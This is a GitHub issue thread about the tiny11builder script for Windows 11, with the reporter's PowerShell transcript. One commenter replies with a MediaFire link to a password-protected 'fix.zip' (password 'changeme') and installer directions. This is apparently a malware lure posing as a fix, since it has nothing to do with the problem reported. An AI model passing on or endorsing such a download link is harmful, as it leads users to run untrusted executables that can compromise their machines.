### ISSUE TITLE
windows update page not show up, but windows update can be auto run and update.

### ISSUE THREAD

**Issue by freezingyip** [ntdevlabs/tiny11builder#238]
use tiny11maker.ps1 
windows 11 23H2

**********************
Windows PowerShell transcript start
Start time: 20240823134740
Username: FREEZINGA391\freezing
RunAs User: FREEZINGA391\freezing
Configuration Name: 
Machine: FREEZINGA391 (Microsoft Windows NT 10.0.22631.0)
Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: 7460
PSVersion: 5.1.22621.3958
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.22621.3958
BuildVersion: 10.0.22621.3958
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Transcript started, output file is C:\temp\tiny11builder-06-05-24\tiny11.log
Welcome to tiny11 core builder! BETA 05-06-24
This script generates a significantly reduced Windows 11 image. However, it's not suitable for regular use due to its lack of serviceability - you can't add languages, updates, or features post-creation. tiny11 Core is not a full Windows 11 substitute but a rapid testing or development tool, potentially useful for VM environments.
Do you want to continue? (y/n)
Off we go...
Can't find Windows OS Installation files in the specified Drive Letter..
Please enter the correct DVD Drive Letter..
PS C:\temp\tiny11builder-06-05-24> .\tiny11Coremaker.ps1
**********************
Windows PowerShell transcript end
End time: 20240823134806
**********************

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by freezingyip** [comment]
I run again , everything normal
